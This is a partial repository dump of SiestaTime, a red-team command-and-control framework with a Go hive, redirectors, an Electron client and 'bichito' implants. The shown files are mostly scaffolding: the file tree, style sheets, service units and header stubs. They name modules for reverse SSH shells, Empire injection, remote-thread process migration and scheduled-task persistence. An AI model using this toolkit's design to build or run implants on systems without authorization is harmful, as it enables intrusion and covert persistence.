├── installConfig ├── reports │ └── .keep ├── vpskeys │ └── .keep ├── downloads │ └── .keep ├── configAWS.txt ├── hive.service ├── implant_dependencies.txt ├── instScriptNoDarwin.sh └── instScript.sh ├── docs ├── requirements.txt ├── _static │ ├── STicon.png │ └── images │ │ ├── install │ │ ├── vsc.png │ │ ├── winsearch.png │ │ └── installconfig.png │ │ ├── hivestatus │ │ ├── jobs.png │ │ └── logs.png │ │ ├── interactions │ │ ├── ls.png │ │ ├── empire.png │ │ ├── exec.png │ │ ├── inject.png │ │ ├── handlers.png │ │ ├── accesschk.png │ │ ├── bichitoinfo.png │ │ ├── dropimplant.png │ │ ├── listimplant.png │ │ ├── sshinteract.png │ │ ├── bichitoheader.png │ │ ├── listbichitos.png │ │ ├── bichitoconsole.png │ │ ├── downloadimplant.png │ │ └── implantwithindroplet.png │ │ ├── addresources │ │ ├── gmail.png │ │ ├── godaddy.png │ │ ├── addec2vpc.png │ │ ├── createops.png │ │ └── domainstatus.png │ │ ├── deployment │ │ ├── droplet.png │ │ ├── deploypost.png │ │ ├── redsonline.png │ │ ├── craftimplant.png │ │ ├── msftworking.png │ │ ├── persistence.png │ │ ├── redsoffline.png │ │ ├── networkmodules.png │ │ ├── persistencexdg.png │ │ └── persistencelaunchd.png │ │ └── reporting │ │ └── createreport.png ├── resources │ ├── operators.rst │ ├── vpc.rst │ └── domains.rst ├── Makefile ├── hive │ └── jobslogs.rst ├── make.bat ├── reporting │ └── basicreport.rst ├── install │ ├── client.rst │ ├── dependencies.rst │ └── hive.rst ├── interactions │ ├── implants.rst │ └── postinteractions.rst ├── misc │ ├── bugs.rst │ └── concepts.rst └── deployment │ └── postservers.rst ├── src ├── client │ ├── electronGUI │ │ ├── static │ │ │ ├── icons │ │ │ │ └── png │ │ │ │ │ ├── STicon.png │ │ │ │ │ ├── STicon2.png │ │ │ │ │ └── STiconM.png │ │ │ └── css │ │ │ │ └── font-awesome-4.7.0 │ │ │ │ ├── fonts │ │ │ │ ├── FontAwesome.otf │ │ │ │ ├── fontawesome-webfont.eot │ │ │ │ ├── fontawesome-webfont.ttf │ │ │ │ ├── fontawesome-webfont.woff │ │ │ │ └── fontawesome-webfont.woff2 │ │ │ │ ├── less │ │ │ │ ├── fixed-width.less │ │ │ │ ├── screen-reader.less │ │ │ │ ├── larger.less │ │ │ │ ├── list.less │ │ │ │ ├── core.less │ │ │ │ ├── stacked.less │ │ │ │ ├── font-awesome.less │ │ │ │ ├── bordered-pulled.less │ │ │ │ ├── rotated-flipped.less │ │ │ │ ├── path.less │ │ │ │ ├── animated.less │ │ │ │ └── mixins.less │ │ │ │ └── scss │ │ │ │ ├── _fixed-width.scss │ │ │ │ ├── _screen-reader.scss │ │ │ │ ├── _larger.scss │ │ │ │ ├── _list.scss │ │ │ │ ├── _core.scss │ │ │ │ ├── font-awesome.scss │ │ │ │ ├── _stacked.scss │ │ │ │ ├── _bordered-pulled.scss │ │ │ │ ├── _rotated-flipped.scss │ │ │ │ ├── _path.scss │ │ │ │ ├── _animated.scss │ │ │ │ └── _mixins.scss │ │ ├── components │ │ │ ├── jobs │ │ │ │ ├── jobs.css │ │ │ │ ├── jobs.html │ │ │ │ └── jobs.js │ │ │ ├── logs │ │ │ │ ├── logs.css │ │ │ │ ├── logs.js │ │ │ │ └── logs.html │ │ │ ├── console │ │ │ │ ├── console.js │ │ │ │ └── console.html │ │ │ ├── report │ │ │ │ ├── report.js │ │ │ │ └── report.html │ │ │ ├── createforms │ │ │ │ ├── createReport.html │ │ │ │ ├── createOperator.html │ │ │ │ ├── createVPS.html │ │ │ │ ├── createDomain.html │ │ │ │ ├── createStaging.html │ │ │ │ └── createImplant.html │ │ │ ├── header │ │ │ │ ├── header.js │ │ │ │ └── header.html │ │ │ ├── vps │ │ │ │ ├── vps.js │ │ │ │ └── vps.html │ │ │ ├── domain │ │ │ │ ├── domain.js │ │ │ │ └── domain.html │ │ │ ├── staging │ │ │ │ └── staging.html │ │ │ └── bichito │ │ │ │ └── bichito.html │ │ ├── renderer.js │ │ ├── package.json │ │ └── main.js │ ├── client.go │ └── clientMisc.go ├── infra │ └── .terraformrc ├── bichito │ ├── modules │ │ ├── biterpreter │ │ │ ├── execute_assembly_windows │ │ │ │ ├── execute_assembly_windows.h │ │ │ │ ├── execute_assembly_windows_x32.go │ │ │ │ ├── execute_assembly_windows_x64.go │ │ │ │ └── execute_assembly_windows.cpp │ │ │ ├── migrate_remote_thread_windows │ │ │ │ ├── migrate_remote_thread_windows.h │ │ │ │ ├── migrate_remote_thread_windows_x32.go │ │ │ │ ├── migrate_remote_thread_windows_x64.go │ │ │ │ └── migrate_remote_thread_windows.cpp │ │ │ ├── sysinfo_native_windows │ │ │ │ └── sysinfo_native_windows.h │ │ │ ├── biterpreter_misc.go │ │ │ ├── sysinfo_native_windows.go │ │ │ ├── downloadf_trio.go │ │ │ ├── writef_trio.go │ │ │ ├── sysinfo_native_darwin.go │ │ │ ├── inject_Empire_darwin.go │ │ │ ├── exec_linuxdarwin.go │ │ │ ├── inject_Empire_linux.go │ │ │ ├── uploadf_trio.go │ │ │ ├── inject_Empire_windows.go │ │ │ ├── sysinfo_native_darwin │ │ │ │ ├── sysinfo_native_darwin.m │ │ │ │ └── sysinfo_native_darwin.go │ │ │ ├── readf_trio.go │ │ │ ├── migrate_linuxdarwin.go │ │ │ ├── accesschk_linuxdarwin.go │ │ │ ├── exec_windows.go │ │ │ ├── migrate_remote_thread_windows.go │ │ │ ├── ls_trio.go │ │ │ ├── accesschk_windows.go │ │ │ ├── wipef_trio.go │ │ │ ├── inject_rev_sshShell_windows.go │ │ │ ├── inject_rev_sshShell_linuxdarwin.go │ │ │ ├── sysinfo_no_native_darwin.go │ │ │ ├── sysinfo_no_native_linux.go │ │ │ ├── sysinfo_no_native_windows.go │ │ │ ├── inject_rev_sshSOCKS5_trio.go │ │ │ └── sysinfo_native_linux.go │ │ ├── persistence │ │ │ ├── windows_schtasks │ │ │ │ ├── windows_schtasks.h │ │ │ │ ├── windows_schtasks.go │ │ │ │ └── windows_schtasks_x64.go │ │ │ ├── no_persistence.go │ │ │ └── windows_schtasks.go │ │ └── network │ │ │ └── https_selfsigned_GO.go │ └── biMisc.go ├── redirector │ ├── redirector.service │ ├── redMisc.go │ ├── redBiComs.go │ └── redirector.go ├── hive │ ├── hive.go │ └── hivMisc.go └── tools │ └── tools.go ├── .gitignore ├── .readthedocs.yml └── stime.sh /installConfig/reports/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /installConfig/vpskeys/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /installConfig/downloads/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /docs/requirements.txt: -------------------------------------------------------------------------------- 1 | sphinx 2 | sphinx_rtd_theme 3 | sphinx-prompt -------------------------------------------------------------------------------- /docs/_static/STicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/STicon.png -------------------------------------------------------------------------------- /docs/_static/images/install/vsc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/install/vsc.png -------------------------------------------------------------------------------- /docs/_static/images/hivestatus/jobs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/hivestatus/jobs.png -------------------------------------------------------------------------------- /docs/_static/images/hivestatus/logs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/hivestatus/logs.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/ls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/ls.png -------------------------------------------------------------------------------- /docs/_static/images/addresources/gmail.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/addresources/gmail.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/droplet.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/droplet.png -------------------------------------------------------------------------------- /docs/_static/images/install/winsearch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/install/winsearch.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/empire.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/empire.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/exec.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/inject.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/inject.png -------------------------------------------------------------------------------- /docs/_static/images/addresources/godaddy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/addresources/godaddy.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/deploypost.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/deploypost.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/redsonline.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/redsonline.png -------------------------------------------------------------------------------- /docs/_static/images/install/installconfig.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/install/installconfig.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/handlers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/handlers.png -------------------------------------------------------------------------------- /docs/_static/images/addresources/addec2vpc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/addresources/addec2vpc.png -------------------------------------------------------------------------------- /docs/_static/images/addresources/createops.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/addresources/createops.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/craftimplant.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/craftimplant.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/msftworking.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/msftworking.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/persistence.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/persistence.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/redsoffline.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/redsoffline.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/accesschk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/accesschk.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/bichitoinfo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/bichitoinfo.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/dropimplant.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/dropimplant.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/listimplant.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/listimplant.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/sshinteract.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/sshinteract.png -------------------------------------------------------------------------------- /docs/_static/images/reporting/createreport.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/reporting/createreport.png -------------------------------------------------------------------------------- /docs/_static/images/addresources/domainstatus.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/addresources/domainstatus.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/networkmodules.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/networkmodules.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/persistencexdg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/persistencexdg.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/bichitoheader.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/bichitoheader.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/listbichitos.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/listbichitos.png -------------------------------------------------------------------------------- /src/client/electronGUI/static/icons/png/STicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/src/client/electronGUI/static/icons/png/STicon.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/persistencelaunchd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/persistencelaunchd.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/bichitoconsole.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/bichitoconsole.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/downloadimplant.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/downloadimplant.png -------------------------------------------------------------------------------- /src/client/electronGUI/static/icons/png/STicon2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/src/client/electronGUI/static/icons/png/STicon2.png -------------------------------------------------------------------------------- /src/client/electronGUI/static/icons/png/STiconM.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/src/client/electronGUI/static/icons/png/STiconM.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/implantwithindroplet.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/implantwithindroplet.png -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | installConfig/configAWS.txt 2 | installConfig/MacOSX10.13.sdk.tar.xz 3 | installConfig/windependencies.zip 4 | installConfig/west1.pem 5 | installConfig/configAWS.txt -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/FontAwesome.otf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/FontAwesome.otf -------------------------------------------------------------------------------- /src/client/electronGUI/components/jobs/jobs.css: -------------------------------------------------------------------------------- 1 | 2 | .my-custom-scrollbar { 3 | position: relative; 4 | height: 790px; 5 | overflow: auto; 6 | } 7 | 8 | .table-wrapper-scroll-y { 9 | display: block; 10 | } -------------------------------------------------------------------------------- /src/client/electronGUI/components/logs/logs.css: -------------------------------------------------------------------------------- 1 | 2 | .my-custom-scrollbar { 3 | position: relative; 4 | height: 790px; 5 | overflow: auto; 6 | } 7 | 8 | .table-wrapper-scroll-y { 9 | display: block; 10 | } -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/fixed-width.less: -------------------------------------------------------------------------------- 1 | // Fixed Width Icons 2 | // ------------------------- 3 | .@{fa-css-prefix}-fw { 4 | width: (18em / 14); 5 | text-align: center; 6 | } 7 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/screen-reader.less: -------------------------------------------------------------------------------- 1 | // Screen Readers 2 | // ------------------------- 3 | 4 | .sr-only { .sr-only(); } 5 | .sr-only-focusable { .sr-only-focusable(); } 6 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/fontawesome-webfont.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/fontawesome-webfont.eot -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/fontawesome-webfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/fontawesome-webfont.ttf -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/fontawesome-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/fontawesome-webfont.woff -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_fixed-width.scss: -------------------------------------------------------------------------------- 1 | // Fixed Width Icons 2 | // ------------------------- 3 | .#{$fa-css-prefix}-fw { 4 | width: (18em / 14); 5 | text-align: center; 6 | } 7 | -------------------------------------------------------------------------------- /src/client/electronGUI/renderer.js: -------------------------------------------------------------------------------- 1 | // This file is required by the index.html file and will 2 | // be executed in the renderer process for that window. 3 | // All of the Node.js APIs are available in this process. 4 | 5 | 6 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/fontawesome-webfont.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/fontawesome-webfont.woff2 -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_screen-reader.scss: -------------------------------------------------------------------------------- 1 | // Screen Readers 2 | // ------------------------- 3 | 4 | .sr-only { @include sr-only(); } 5 | .sr-only-focusable { @include sr-only-focusable(); } 6 | -------------------------------------------------------------------------------- /src/infra/.terraformrc: -------------------------------------------------------------------------------- 1 | provider_installation { 2 | filesystem_mirror { 3 | path = "/root/.terraform.d/plugins/" 4 | include = ["hashicorp/godaddy"] 5 | } 6 | direct { 7 | exclude = ["hashicorp/godaddy"] 8 | } 9 | } -------------------------------------------------------------------------------- /installConfig/configAWS.txt: -------------------------------------------------------------------------------- 1 | USERNAME: 2 | PASSWORD: 3 | port: 4 | accesskey: 5 | secretkey: 6 | region: 7 | keyname: 8 | ami: 9 | itype: 10 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/execute_assembly_windows/execute_assembly_windows.h: -------------------------------------------------------------------------------- 1 | #ifndef windows_executeassembly_windows_H_ 2 | #define windows_executeassembly_windows_H_ 3 | 4 | #ifdef __cplusplus 5 | extern "C" { 6 | #endif 7 | 8 | int ExecuteAssembly(char*,int,char*); 9 | 10 | #ifdef __cplusplus 11 | } 12 | #endif 13 | 14 | #endif -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/migrate_remote_thread_windows/migrate_remote_thread_windows.h: -------------------------------------------------------------------------------- 1 | #ifndef migrate_remote_thread_windows_H_ 2 | #define migrate_remote_thread_windows_H_ 3 | 4 | #ifdef __cplusplus 5 | extern "C" { 6 | #endif 7 | 8 | int Migrate(char*,int,int,char*); 9 | 10 | #ifdef __cplusplus 11 | } 12 | #endif 13 | 14 | #endif -------------------------------------------------------------------------------- /src/bichito/modules/persistence/windows_schtasks/windows_schtasks.h: -------------------------------------------------------------------------------- 1 | #ifndef windows_schtasks_H_ 2 | #define windows_schtasks_H_ 3 | 4 | #ifdef __cplusplus 5 | extern "C" { 6 | #endif 7 | 8 | int SchtasksOnUserLogon(char*,char*,char*); 9 | int SchtasksDelete(char*, char*); 10 | 11 | #ifdef __cplusplus 12 | } 13 | #endif 14 | 15 | #endif 16 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/sysinfo_native_windows/sysinfo_native_windows.h: -------------------------------------------------------------------------------- 1 | #ifndef sysinfo_native_windows_H_ 2 | #define sysinfo_native_windows_H_ 3 | 4 | #ifdef __cplusplus 5 | extern "C" { 6 | #endif 7 | 8 | int ProcessIntegrity(char*, char*); 9 | int IsLocalAdmin(char*, char*); 10 | 11 | #ifdef __cplusplus 12 | } 13 | #endif 14 | 15 | #endif 16 | 17 | -------------------------------------------------------------------------------- /installConfig/hive.service: -------------------------------------------------------------------------------- 1 | [Unit] 2 | Description=STime Hive 3 | After=syslog.target network.target remote-fs.target nss-lookup.target 4 | 5 | [Service] 6 | Type=simple 7 | WorkingDirectory=/usr/local/STHive/ 8 | ExecStart=/usr/local/STHive/hive 9 | Restart=on-failure 10 | LimitNOFILE=10000 11 | StandardOutput=syslog 12 | StandardError=syslog 13 | SyslogIdentifier=hive.service 14 | 15 | [Install] 16 | WantedBy=multi-user.target -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/biterpreter_misc.go: -------------------------------------------------------------------------------- 1 | // +build linux darwin windows 2 | 3 | package biterpreter 4 | 5 | import ( 6 | "golang.org/x/crypto/ssh" 7 | ) 8 | 9 | 10 | func loadPrivateKey(keyString string) (ssh.AuthMethod, error) { 11 | 12 | signer, signerErr := ssh.ParsePrivateKey([]byte(keyString)) 13 | if signerErr != nil { 14 | return nil, signerErr 15 | } 16 | return ssh.PublicKeys(signer), nil 17 | } -------------------------------------------------------------------------------- /src/bichito/modules/persistence/no_persistence.go: -------------------------------------------------------------------------------- 1 | // +build nopersistence 2 | 3 | package persistence 4 | 5 | func AddPersistence(jsonPersistence string,blob string) (bool,string){ 6 | 7 | return false,"None" 8 | } 9 | 10 | func CheckPersistence(jsonPersistence string) (bool,string){ 11 | 12 | 13 | return false,"None" 14 | } 15 | 16 | 17 | func RemovePersistence(jsonPersistence string) (bool,string){ 18 | 19 | return false,"None" 20 | } -------------------------------------------------------------------------------- /src/redirector/redirector.service: -------------------------------------------------------------------------------- 1 | [Unit] 2 | Description=STime Redirector 3 | After=syslog.target network.target remote-fs.target nss-lookup.target 4 | 5 | [Service] 6 | Type=simple 7 | WorkingDirectory=/usr/local/redirector/ 8 | ExecStart=/usr/local/redirector/redirector 9 | Restart=on-failure 10 | LimitNOFILE=10000 11 | StandardOutput=syslog 12 | StandardError=syslog 13 | SyslogIdentifier=redirector.service 14 | 15 | [Install] 16 | WantedBy=multi-user.target 17 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/larger.less: -------------------------------------------------------------------------------- 1 | // Icon Sizes 2 | // ------------------------- 3 | 4 | /* makes the font 33% larger relative to the icon container */ 5 | .@{fa-css-prefix}-lg { 6 | font-size: (4em / 3); 7 | line-height: (3em / 4); 8 | vertical-align: -15%; 9 | } 10 | .@{fa-css-prefix}-2x { font-size: 2em; } 11 | .@{fa-css-prefix}-3x { font-size: 3em; } 12 | .@{fa-css-prefix}-4x { font-size: 4em; } 13 | .@{fa-css-prefix}-5x { font-size: 5em; } 14 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_larger.scss: -------------------------------------------------------------------------------- 1 | // Icon Sizes 2 | // ------------------------- 3 | 4 | /* makes the font 33% larger relative to the icon container */ 5 | .#{$fa-css-prefix}-lg { 6 | font-size: (4em / 3); 7 | line-height: (3em / 4); 8 | vertical-align: -15%; 9 | } 10 | .#{$fa-css-prefix}-2x { font-size: 2em; } 11 | .#{$fa-css-prefix}-3x { font-size: 3em; } 12 | .#{$fa-css-prefix}-4x { font-size: 4em; } 13 | .#{$fa-css-prefix}-5x { font-size: 5em; } 14 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/list.less: -------------------------------------------------------------------------------- 1 | // List Icons 2 | // ------------------------- 3 | 4 | .@{fa-css-prefix}-ul { 5 | padding-left: 0; 6 | margin-left: @fa-li-width; 7 | list-style-type: none; 8 | > li { position: relative; } 9 | } 10 | .@{fa-css-prefix}-li { 11 | position: absolute; 12 | left: -@fa-li-width; 13 | width: @fa-li-width; 14 | top: (2em / 14); 15 | text-align: center; 16 | &.@{fa-css-prefix}-lg { 17 | left: (-@fa-li-width + (4em / 14)); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_list.scss: -------------------------------------------------------------------------------- 1 | // List Icons 2 | // ------------------------- 3 | 4 | .#{$fa-css-prefix}-ul { 5 | padding-left: 0; 6 | margin-left: $fa-li-width; 7 | list-style-type: none; 8 | > li { position: relative; } 9 | } 10 | .#{$fa-css-prefix}-li { 11 | position: absolute; 12 | left: -$fa-li-width; 13 | width: $fa-li-width; 14 | top: (2em / 14); 15 | text-align: center; 16 | &.#{$fa-css-prefix}-lg { 17 | left: -$fa-li-width + (4em / 14); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/core.less: -------------------------------------------------------------------------------- 1 | // Base Class Definition 2 | // ------------------------- 3 | 4 | .@{fa-css-prefix} { 5 | display: inline-block; 6 | font: normal normal normal @fa-font-size-base/@fa-line-height-base FontAwesome; // shortening font declaration 7 | font-size: inherit; // can't have font-size inherit on line above, so need to override 8 | text-rendering: auto; // optimizelegibility throws things off #1094 9 | -webkit-font-smoothing: antialiased; 10 | -moz-osx-font-smoothing: grayscale; 11 | 12 | } 13 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_core.scss: -------------------------------------------------------------------------------- 1 | // Base Class Definition 2 | // ------------------------- 3 | 4 | .#{$fa-css-prefix} { 5 | display: inline-block; 6 | font: normal normal normal #{$fa-font-size-base}/#{$fa-line-height-base} FontAwesome; // shortening font declaration 7 | font-size: inherit; // can't have font-size inherit on line above, so need to override 8 | text-rendering: auto; // optimizelegibility throws things off #1094 9 | -webkit-font-smoothing: antialiased; 10 | -moz-osx-font-smoothing: grayscale; 11 | 12 | } 13 | -------------------------------------------------------------------------------- /docs/resources/operators.rst: -------------------------------------------------------------------------------- 1 | Operators 2 | =========================== 3 | 4 | 5 | Admin User (the one created alongside Hive) will be able to add new operators to the Hive DB. **This will let other operators on your team to log and perform any other action but add operators.** 6 | 7 | 8 | Adding Opeators 9 | -------------------------------------------- 10 | 11 | ``Operators --> Add Operator`` 12 | 13 | .. figure:: ../_static/images/addresources/createops.png 14 | :align: center 15 | :figwidth: 600px 16 | :target: ../_static/images/addresources/createops.png 17 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/font-awesome.scss: -------------------------------------------------------------------------------- 1 | /*! 2 | * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome 3 | * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) 4 | */ 5 | 6 | @import "variables"; 7 | @import "mixins"; 8 | @import "path"; 9 | @import "core"; 10 | @import "larger"; 11 | @import "fixed-width"; 12 | @import "list"; 13 | @import "bordered-pulled"; 14 | @import "animated"; 15 | @import "rotated-flipped"; 16 | @import "stacked"; 17 | @import "icons"; 18 | @import "screen-reader"; 19 | -------------------------------------------------------------------------------- /src/hive/hive.go: -------------------------------------------------------------------------------- 1 | //{{{{{{{ Hive Main Function }}}}}}} 2 | //By Rebujacker - Alvaro Folgado Rueda as an open source educative project / 3 | 4 | package main 5 | 6 | 7 | /* 8 | Description: Hive Main Function 9 | Flow: 10 | A.Initialize on disk DB and "on-memory" data structures 11 | B.Initialize the main https handler for Hive (so Operators and redirectors can connect) 12 | */ 13 | func main() { 14 | 15 | //Start the DB connection and feed on memory arrays 16 | startDB() 17 | 18 | //Configure http client and start listening connections from Operators and Implants 19 | startRoaster() 20 | } -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/stacked.less: -------------------------------------------------------------------------------- 1 | // Stacked Icons 2 | // ------------------------- 3 | 4 | .@{fa-css-prefix}-stack { 5 | position: relative; 6 | display: inline-block; 7 | width: 2em; 8 | height: 2em; 9 | line-height: 2em; 10 | vertical-align: middle; 11 | } 12 | .@{fa-css-prefix}-stack-1x, .@{fa-css-prefix}-stack-2x { 13 | position: absolute; 14 | left: 0; 15 | width: 100%; 16 | text-align: center; 17 | } 18 | .@{fa-css-prefix}-stack-1x { line-height: inherit; } 19 | .@{fa-css-prefix}-stack-2x { font-size: 2em; } 20 | .@{fa-css-prefix}-inverse { color: @fa-inverse; } 21 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/sysinfo_native_windows.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package biterpreter 4 | 5 | import ( 6 | "bichito/modules/biterpreter/sysinfo_native_windows" 7 | ) 8 | 9 | 10 | /* 11 | Description: Sysinfo --> Windows. Retrieve Operating System key information from the foothold. 12 | Flow: 13 | A.Use C++ to retrieve this key information: sysinfo_native_windows.cpp 14 | Note: These libraries need to be extracted from a darwin dev. kit, and are compiled with mingw32 15 | */ 16 | func Sysinfo() (bool,string){ 17 | 18 | error,result := sysinfo_native_windows.SysinfoNativeWindows() 19 | return error,result 20 | } -------------------------------------------------------------------------------- /src/client/electronGUI/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "SiestaTime", 